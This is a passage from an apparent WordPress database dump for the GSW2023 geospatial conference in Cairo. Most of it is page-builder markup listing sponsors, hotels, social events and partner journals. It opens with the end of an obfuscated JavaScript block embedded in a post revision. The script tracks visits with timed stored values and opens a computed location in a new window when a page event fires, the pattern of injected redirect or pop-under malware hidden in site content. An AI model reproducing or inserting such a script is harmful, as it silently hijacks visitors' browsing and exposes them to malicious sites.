Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 03:04:23','2023-08-16 03:04:23','',3066,'https://gsw2023.com/?p=5282',0,'revision','',0),
(5283,1,'2023-08-16 03:11:08','2023-08-16 03:11:08','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155359389{margin-top: 85px !important;margin-right: -85px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692154953581{margin-left: -85px !important;}\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" 